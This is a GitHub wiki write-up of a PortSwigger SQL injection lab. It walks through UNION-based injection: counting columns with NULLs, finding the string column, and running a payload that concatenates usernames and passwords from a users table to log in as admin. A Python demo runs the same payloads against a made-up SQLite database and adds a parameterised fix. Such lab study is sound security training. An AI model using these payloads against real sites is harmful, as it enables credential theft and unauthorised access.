SQL injection UNION attack, retrieving multiple values in a single column - KA4KA4/PortSwigger-SQL-injection-Labs GitHub Wiki

Hello, let's start the lab.

Access the machine, go to the Gifts module, intercept the request and send it to Repeater.

In real-world bug bounty work, we need to provoke an error in the response to a request in order to detect SQL injection on a website; from the error we can learn how the database handles the requests that come from the user.

We can trigger an error by adding " or ' or / or *, by using encoding, and so on.

So now we get an error:

[screenshot 1]

As you can see, we get an internal server error, which indicates a possible SQL injection.

It's time for testing.

Remember this sentence: the doctor does not know the exact condition of the patient until he is examined.

Now we can use a SQL injection query to find the number of columns.

'+UNION+SELECT+NULL,NULL--

-EXPLAIN: the query uses UNION SELECT. This query retrieves data from other tables and returns it together with the original results. The NULL values are placeholders used to detect the number of columns and the data type of each column. The query ends with --, a comment indicator in SQL, which causes the rest of the original query to be ignored.

After understanding the query, the first thing we need is the number of columns. We find it by adding NULL values one at a time; as long as we still get an error, the number of NULLs does not match the number of columns yet.

After adding NULL values to the query we find that the number of columns is two.

[screenshot 2]

Now we need to know the data type of the columns, meaning which column is a string and which column is an integer.

Try adding a string value in the first column.

[screenshot 3]

The error indicates that the first column is not a string.

Try adding a string value in the second column.

[screenshot 4]

Now we get no error, which means the second column is a string, and that is the column we will work with.

PortSwigger gave us the column names and table names; we need to get the username and password from the table, so we will use CONCATENATION.

-CONCATENATION: this operation merges two or more values into a single value. An operator such as || is used to concatenate the username and password fields together.

This means we can get the username and password fields together in the second column.

Note that we can't use the first column because it is not a string.

Now add the query:

'+UNION+SELECT+NULL,username||'='||password+FROM+users--

-Aggregate explanation: we use UNION SELECT to retrieve data from other tables. Then we detect the number of columns in the table. Then we determine the data type of each column by adding strings, and learn that the second column is a string. Then we use the concatenation operator to merge the two columns (username and password) into one value taken from the users table. The query ends with --, a comment indicator in SQL, which causes the rest of the original query to be ignored.
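As an added illustration that is not part of the original write-up, the Python script below reproduces the same steps against a constructed in-memory SQLite database: the string-concatenated query the lab models, the NULL-counting probe, the concatenation payload shown above, and a parameterised query that turns the same input into a harmless literal. The schema, product rows and credentials are made up for the demo.

```python
import sqlite3

def build_db():
    # Constructed stand-in for the lab's database (not PortSwigger's real schema).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'Gifts'), ('Pen', 'Gifts');
        INSERT INTO users VALUES ('administrator', 's3cret'), ('carlos', 'hunter2');
    """)
    return db

def vulnerable_filter(db, category):
    # The bug the lab models: user input is spliced straight into the SQL text,
    # so a quote in the input closes the string and the rest runs as SQL.
    sql = "SELECT name, category FROM products WHERE category = '" + category + "'"
    return db.execute(sql).fetchall()

def safe_filter(db, category):
    # Hardened form: a bound parameter is always data, never SQL, so the
    # same payload simply matches no category and returns nothing.
    sql = "SELECT name, category FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def probe_column_count(db, max_cols=5):
    # The write-up's first step: add NULLs until the UNION stops erroring.
    # SQLite rejects a UNION whose two sides have different column counts.
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            vulnerable_filter(db, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None

# The concatenation payload from the write-up, URL-decoded (+ becomes a space).
CREDS_PAYLOAD = "' UNION SELECT NULL,username||'='||password FROM users--"

if __name__ == "__main__":
    db = build_db()
    print("columns:", probe_column_count(db))
    print("vulnerable:", vulnerable_filter(db, CREDS_PAYLOAD))
    print("parameterised:", safe_filter(db, CREDS_PAYLOAD))
```

Running it shows the injected second column carrying `username=password` pairs from the vulnerable query, while the parameterised version returns an empty result for the identical input.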

[screenshot 5]

Copy the URL of the response and paste it in the browser.

[screenshot 6]

Now we have the usernames and passwords.

To solve the lab, log in with the admin user.

[screenshot 7]

Now we have solved the lab. Thank you! 🥇